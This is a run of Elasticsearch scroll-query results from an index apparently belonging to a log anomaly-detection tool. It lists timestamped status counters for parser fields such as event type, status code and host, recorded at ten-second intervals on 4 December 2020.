{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DDPsLXYBIkOurnXXl4jN","_score":1.0,"_source":{"FromTime":1.607088238639867E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":2231,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:08.677Z","ToTime":1.607088248639983E9,"fromtimestamp":"2020-12-04T13:23:58.639Z","totimestamp":"2020-12-04T13:24:08.639Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EDPsLXYBIkOurnXXv4hE","_score":1.0,"_source":{"FromTime":1.607088248719976E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":70,"/parser/model/type_str":5910,"/parser/model/php":0,"/parser/model/status_code":30,"/parser/model/host":9,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:18.781Z","ToTime":1.60708825872006E9,"fromtimestamp":"2020-12-04T13:24:08.719Z","totimestamp":"2020-12-04T13:24:18.720Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"FjPsLXYBIkOurnXX54gp","_score":1.0,"_source":{"FromTime":1.607088258956716E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":40,"/parser/model/type_str":1044,"/parser/model/php":0,"/parser/model/status_code":12,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:28.994Z","ToTime":1.607088268956817E9,"fromtimestamp":"2020-12-04T13:24:18.956Z","totimestamp":"2020-12-04T13:24:28.956Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GjPtLXYBIkOurnXXEIj5","_score":1.0,"_source":{"FromTime":1.607088269659532E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":35,"/parser/model/type_str":3839,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:39.697Z","ToTime":1.607088279659616E9,"fromtimestamp":"2020-12-04T13:24:29.659Z","totimestamp":"2020-12-04T13:24:39.659Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HzPtLXYBIkOurnXXOYhP","_score":1.0,"_source":{"FromTime":1.607088279986282E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":20,"/parser/model/type_str":1729,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:24:50.024Z","ToTime":1.607088289986358E9,"fromtimestamp":"2020-12-04T13:24:39.986Z","totimestamp":"2020-12-04T13:24:49.986Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JTPtLXYBIkOurnXXYIjV","_score":1.0,"_source":{"FromTime":1.607088290105456E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":488,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":2},"timestamp":"2020-12-04T13:25:00.142Z","ToTime":1.607088300105532E9,"fromtimestamp":"2020-12-04T13:24:50.105Z","totimestamp":"2020-12-04T13:25:00.105Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KjPtLXYBIkOurnXXiIhn","_score":1.0,"_source":{"FromTime":1.607088300236322E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":16,"/parser/model/type_str":405,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:10.273Z","ToTime":1.607088310236405E9,"fromtimestamp":"2020-12-04T13:25:00.236Z","totimestamp":"2020-12-04T13:25:10.236Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LjPtLXYBIkOurnXXsogA","_score":1.0,"_source":{"FromTime":1.607088310881677E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":3525,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:20.921Z","ToTime":1.607088320881773E9,"fromtimestamp":"2020-12-04T13:25:10.881Z","totimestamp":"2020-12-04T13:25:20.881Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NDPtLXYBIkOurnXX24gM","_score":1.0,"_source":{"FromTime":1.607088321391445E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2498,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:31.429Z","ToTime":1.607088331391522E9,"fromtimestamp":"2020-12-04T13:25:21.391Z","totimestamp":"2020-12-04T13:25:31.391Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ODPuLXYBIkOurnXXAoiV","_score":1.0,"_source":{"FromTime":1.607088331512345E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":312,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:41.550Z","ToTime":1.607088341512401E9,"fromtimestamp":"2020-12-04T13:25:31.512Z","totimestamp":"2020-12-04T13:25:41.512Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PTPuLXYBIkOurnXXKogl","_score":1.0,"_source":{"FromTime":1.607088341638619E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":490,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:25:51.677Z","ToTime":1.60708835163873E9,"fromtimestamp":"2020-12-04T13:25:41.638Z","totimestamp":"2020-12-04T13:25:51.638Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"QzPuLXYBIkOurnXXUYiA","_score":1.0,"_source":{"FromTime":1.607088351700008E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":178,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:01.752Z","ToTime":1.607088361700072E9,"fromtimestamp":"2020-12-04T13:25:51.700Z","totimestamp":"2020-12-04T13:26:01.700Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RzPuLXYBIkOurnXXeoh6","_score":1.0,"_source":{"FromTime":1.607088362206958E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":2781,"/parser/model/php":0,"/parser/model/status_code":6,"/parser/model/host":5,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:12.243Z","ToTime":1.607088372207032E9,"fromtimestamp":"2020-12-04T13:26:02.206Z","totimestamp":"2020-12-04T13:26:12.207Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"TTPuLXYBIkOurnXXoojy","_score":1.0,"_source":{"FromTime":1.607088372563724E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":2015,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:22.602Z","ToTime":1.607088382563822E9,"fromtimestamp":"2020-12-04T13:26:12.563Z","totimestamp":"2020-12-04T13:26:22.563Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"UTPuLXYBIkOurnXXyoiq","_score":1.0,"_source":{"FromTime":1.607088382723041E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":618,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:32.771Z","ToTime":1.607088392723119E9,"fromtimestamp":"2020-12-04T13:26:22.723Z","totimestamp":"2020-12-04T13:26:32.723Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"VTPuLXYBIkOurnXX8Yjy","_score":1.0,"_source":{"FromTime":1.607088392788693E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":151,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:42.826Z","ToTime":1.607088402788764E9,"fromtimestamp":"2020-12-04T13:26:32.788Z","totimestamp":"2020-12-04T13:26:42.788Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"WzPvLXYBIkOurnXXGYho","_score":1.0,"_source":{"FromTime":1.607088402876697E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":319,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:26:52.928Z","ToTime":1.607088412876761E9,"fromtimestamp":"2020-12-04T13:26:42.876Z","totimestamp":"2020-12-04T13:26:52.876Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"YDPvLXYBIkOurnXXQYhb","_score":1.0,"_source":{"FromTime":1.607088413096821E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":1141,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:03.155Z","ToTime":1.607088423096905E9,"fromtimestamp":"2020-12-04T13:26:53.096Z","totimestamp":"2020-12-04T13:27:03.096Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ZTPvLXYBIkOurnXXaYhw","_score":1.0,"_source":{"FromTime":1.607088423360947E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":27,"/parser/model/type_str":1073,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:13.417Z","ToTime":1.607088433361018E9,"fromtimestamp":"2020-12-04T13:27:03.360Z","totimestamp":"2020-12-04T13:27:13.361Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ajPvLXYBIkOurnXXkYhn","_score":1.0,"_source":{"FromTime":1.607088433607134E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":19,"/parser/model/type_str":988,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:23.648Z","ToTime":1.607088443607235E9,"fromtimestamp":"2020-12-04T13:27:13.607Z","totimestamp":"2020-12-04T13:27:23.607Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"bzPvLXYBIkOurnXXuojy","_score":1.0,"_source":{"FromTime":1.607088444216048E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":14,"/parser/model/type_str":3588,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:34.283Z","ToTime":1.607088454216143E9,"fromtimestamp":"2020-12-04T13:27:24.216Z","totimestamp":"2020-12-04T13:27:34.216Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"czPvLXYBIkOurnXX4ogb","_score":1.0,"_source":{"FromTime":1.607088454263898E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":103,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:44.308Z","ToTime":1.607088464264148E9,"fromtimestamp":"2020-12-04T13:27:34.263Z","totimestamp":"2020-12-04T13:27:44.264Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"eDPwLXYBIkOurnXXDIhj","_score":1.0,"_source":{"FromTime":1.607088465094996E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":26,"/parser/model/type_str":4659,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:27:55.132Z","ToTime":1.607088475095059E9,"fromtimestamp":"2020-12-04T13:27:45.094Z","totimestamp":"2020-12-04T13:27:55.095Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"fjPwLXYBIkOurnXXM4jZ","_score":1.0,"_source":{"FromTime":1.607088475178856E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":275,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:05.234Z","ToTime":1.607088485178946E9,"fromtimestamp":"2020-12-04T13:27:55.178Z","totimestamp":"2020-12-04T13:28:05.178Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"gjPwLXYBIkOurnXXW4ic","_score":1.0,"_source":{"FromTime":1.607088485375105E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":1029,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:15.413Z","ToTime":1.607088495375182E9,"fromtimestamp":"2020-12-04T13:28:05.375Z","totimestamp":"2020-12-04T13:28:15.375Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"iDPwLXYBIkOurnXXg4jt","_score":1.0,"_source":{"FromTime":1.607088495696157E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1714,"/parser/model/php":0,"/parser/model/status_code":4,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:25.734Z","ToTime":1.607088505696266E9,"fromtimestamp":"2020-12-04T13:28:15.696Z","totimestamp":"2020-12-04T13:28:25.696Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"jDPwLXYBIkOurnXXrIho","_score":1.0,"_source":{"FromTime":1.607088506059213E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":2004,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:36.097Z","ToTime":1.607088516059322E9,"fromtimestamp":"2020-12-04T13:28:26.059Z","totimestamp":"2020-12-04T13:28:36.059Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"kDPwLXYBIkOurnXX04iY","_score":1.0,"_source":{"FromTime":1.607088516083463E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:46.128Z","ToTime":1.607088526083539E9,"fromtimestamp":"2020-12-04T13:28:36.083Z","totimestamp":"2020-12-04T13:28:46.083Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ljPwLXYBIkOurnXX-4gg","_score":1.0,"_source":{"FromTime":1.607088526182068E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":4,"/parser/model/type_str":399,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:28:56.248Z","ToTime":1.607088536182151E9,"fromtimestamp":"2020-12-04T13:28:46.182Z","totimestamp":"2020-12-04T13:28:56.182Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"mzPxLXYBIkOurnXXJIjl","_score":1.0,"_source":{"FromTime":1.60708853690535E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":12,"/parser/model/type_str":3908,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:29:06.942Z","ToTime":1.607088546905412E9,"fromtimestamp":"2020-12-04T13:28:56.905Z","totimestamp":"2020-12-04T13:29:06.905Z","version":"1"}}]}} 